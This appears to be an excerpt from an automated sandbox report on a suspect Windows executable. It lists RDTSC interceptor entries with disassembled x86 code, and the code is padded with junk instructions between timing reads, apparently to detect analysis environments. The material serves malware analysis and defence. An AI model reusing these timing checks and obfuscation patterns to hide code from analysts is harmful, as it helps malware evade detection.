                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E204D6 second address: 4E204EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov di, 37A8h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E204EA second address: 4E204FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F333124C7DCh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E204FC second address: 4E20512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F333123881Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E4085E second address: 4E40899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, cl 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c call 00007F333124C7DEh 0x00000011 push esi 0x00000012 pop edi 0x00000013 pop esi 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F333124C7E8h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40899 second address: 4E4089F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E4089F second address: 4E408A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E408A3 second address: 4E408A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E408A7 second address: 4E408C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F333124C7E4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E408C7 second address: 4E4092F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F3331238826h 0x0000000f push eax 0x00000010 jmp 00007F333123881Bh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 mov si, 8A7Bh 0x0000001b call 00007F3331238820h 0x00000020 mov dh, ah 0x00000022 pop edi 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F3331238829h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E4092F second address: 4E409AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F333124C7E1h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F333124C7DCh 0x00000017 add si, AFB8h 0x0000001c jmp 00007F333124C7DBh 0x00000021 popfd 0x00000022 jmp 00007F333124C7E8h 0x00000027 popad 0x00000028 lea eax, dword ptr [ebp-04h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F333124C7E7h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E409AB second address: 4E409D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3331238829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E409D1 second address: 4E40A0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F333124C7DBh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F333124C7E5h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40A45 second address: 4E40A4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40A4B second address: 4E40A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F333124C7DDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40A5C second address: 4E40A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c jmp 00007F333123881Dh 0x00000011 mov esi, eax 0x00000013 pushad 0x00000014 jmp 00007F333123881Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b mov cx, 3B07h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40B08 second address: 4E40B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F333124C7E0h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40B26 second address: 4E40B45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3331238821h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40B45 second address: 4E40B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40B4C second address: 4E40B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F333123881Ch 0x00000009 add ecx, 180BC698h 0x0000000f jmp 00007F333123881Bh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a leave 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edx, 7E5DB674h 0x00000023 movsx ebx, si 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40B80 second address: 4E301F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F333124C7DEh 0x0000000c jmp 00007F333124C7E5h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 retn 0004h 0x00000018 nop 0x00000019 sub esp, 04h 0x0000001c xor ebx, ebx 0x0000001e cmp eax, 00000000h 0x00000021 je 00007F333124C93Ah 0x00000027 mov dword ptr [esp], 0000000Dh 0x0000002e call 00007F3335B98B4Bh 0x00000033 mov edi, edi 0x00000035 pushad 0x00000036 pushad 0x00000037 push eax 0x00000038 pop edx 0x00000039 popad 0x0000003a movsx ebx, cx 0x0000003d popad 0x0000003e xchg eax, ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F333124C7DDh 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E301F5 second address: 4E30236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov dx, C37Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3331238821h 0x00000017 adc esi, 42F9EF06h 0x0000001d jmp 00007F3331238821h 0x00000022 popfd 0x00000023 mov eax, 5F4BB2B7h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30236 second address: 4E30287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F333124C7DEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dl, AAh 0x00000016 pushfd 0x00000017 jmp 00007F333124C7E6h 0x0000001c xor ecx, 3B736338h 0x00000022 jmp 00007F333124C7DBh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30287 second address: 4E302B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 2Ch 0x0000000d jmp 00007F3331238827h 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx ebx, ax 0x00000019 mov dh, ah 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E302B5 second address: 4E30314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F333124C7E1h 0x00000011 adc ah, FFFFFF96h 0x00000014 jmp 00007F333124C7E1h 0x00000019 popfd 0x0000001a mov edi, eax 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F333124C7E4h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30314 second address: 4E30323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30323 second address: 4E30392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F333124C7E5h 0x0000000b xor ecx, 1E7AFA06h 0x00000011 jmp 00007F333124C7E1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c pushad 0x0000001d mov edi, eax 0x0000001f mov dh, ah 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F333124C7DBh 0x00000028 and cl, 0000003Eh 0x0000002b jmp 00007F333124C7E9h 0x00000030 popfd 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30392 second address: 4E30398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30449 second address: 4E3047E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov bh, 5Eh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e pushad 0x0000000f mov al, 1Dh 0x00000011 mov ebx, 4CB4AEDEh 0x00000016 popad 0x00000017 movsx edx, cx 0x0000001a popad 0x0000001b je 00007F333124C9EAh 0x00000021 pushad 0x00000022 mov cx, 8153h 0x00000026 mov ecx, 040CDFAFh 0x0000002b popad 0x0000002c lea ecx, dword ptr [ebp-14h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov ah, bh 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30588 second address: 4E3058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E3058E second address: 4E30592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30616 second address: 4E3062E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3331238824h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E3062E second address: 4E30632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30632 second address: 4E30643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30643 second address: 4E30647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30647 second address: 4E3064B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E3064B second address: 4E30651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30651 second address: 4E30657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30657 second address: 4E3068A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F33A180A607h 0x00000011 jmp 00007F333124C7DEh 0x00000016 mov ebx, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov eax, edi 0x0000001e mov si, bx 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30790 second address: 4E3079F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E3079F second address: 4E307B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F333124C7E4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E307B7 second address: 4E307DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3331238820h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E307DE second address: 4E307E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E307E4 second address: 4E307EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E307EA second address: 4E307EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E307EE second address: 4E307F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E307F2 second address: 4E30014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F33A180A631h 0x0000000e xor eax, eax 0x00000010 jmp 00007F3331225F0Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 xor ebx, ebx 0x00000024 cmp esi, 00000000h 0x00000027 je 00007F333124C915h 0x0000002d call 00007F3335B9881Ch 0x00000032 mov edi, edi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F333124C7E0h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30014 second address: 4E3001A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E3001A second address: 4E3001E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E3001E second address: 4E3005C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F3331238824h 0x0000000f push esi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3331238824h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E3005C second address: 4E3012F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F333124C7E1h 0x00000009 adc cx, F536h 0x0000000e jmp 00007F333124C7E1h 0x00000013 popfd 0x00000014 mov eax, 30967127h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F333124C7E8h 0x00000025 add cx, EB88h 0x0000002a jmp 00007F333124C7DBh 0x0000002f popfd 0x00000030 call 00007F333124C7E8h 0x00000035 pop edx 0x00000036 popad 0x00000037 xchg eax, ecx 0x00000038 pushad 0x00000039 push ecx 0x0000003a pushfd 0x0000003b jmp 00007F333124C7E9h 0x00000040 jmp 00007F333124C7DBh 0x00000045 popfd 0x00000046 pop esi 0x00000047 mov edx, 055AB28Ch 0x0000004c popad 0x0000004d push eax 0x0000004e pushad 0x0000004f call 00007F333124C7E0h 0x00000054 pop ebx 0x00000055 mov edi, eax 0x00000057 popad 0x00000058 xchg eax, ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F333124C7DFh 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30C99 second address: 4E30C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30C9F second address: 4E30CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30CA3 second address: 4E30CC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, 88A6h 0x00000013 mov cx, dx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30CC0 second address: 4E30CFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F333124C7DCh 0x00000013 adc cl, 00000078h 0x00000016 jmp 00007F333124C7DBh 0x0000001b popfd 0x0000001c push esi 0x0000001d pop edx 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30CFF second address: 4E30D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3331238826h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30D22 second address: 4E30D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F333124C7DEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30D34 second address: 4E30D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30D38 second address: 4E30D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F333124C7E8h 0x00000013 add ax, 0898h 0x00000018 jmp 00007F333124C7DBh 0x0000001d popfd 0x0000001e mov ah, DEh 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30D72 second address: 4E30D97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [7544459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3331238821h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30D97 second address: 4E30D9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30D9D second address: 4E30DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30DA3 second address: 4E30DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30DA7 second address: 4E30DAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E30DAB second address: 4E30E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F33A17FA422h 0x0000000e jmp 00007F333124C7E2h 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F333124C7E9h 0x0000001f sub eax, 218E13A6h 0x00000025 jmp 00007F333124C7E1h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40033 second address: 4E40037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E40037 second address: 4E4004A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E4004A second address: 4E400BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F333123881Fh 0x00000009 sbb cl, FFFFFF9Eh 0x0000000c jmp 00007F3331238829h 0x00000011 popfd 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 call 00007F33A17DE308h 0x0000001d push 753E2B70h 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov eax, dword ptr [esp+10h] 0x0000002d mov dword ptr [esp+10h], ebp 0x00000031 lea ebp, dword ptr [esp+10h] 0x00000035 sub esp, eax 0x00000037 push ebx 0x00000038 push esi 0x00000039 push edi 0x0000003a mov eax, dword ptr [75444538h] 0x0000003f xor dword ptr [ebp-04h], eax 0x00000042 xor eax, ebp 0x00000044 push eax 0x00000045 mov dword ptr [ebp-18h], esp 0x00000048 push dword ptr [ebp-08h] 0x0000004b mov eax, dword ptr [ebp-04h] 0x0000004e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000055 mov dword ptr [ebp-08h], eax 0x00000058 lea eax, dword ptr [ebp-10h] 0x0000005b mov dword ptr fs:[00000000h], eax 0x00000061 ret 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 pushfd 0x00000066 jmp 00007F333123881Fh 0x0000006b adc si, 8BAEh 0x00000070 jmp 00007F3331238829h 0x00000075 popfd 0x00000076 movzx eax, dx 0x00000079 popad 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E400BB second address: 4E400C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
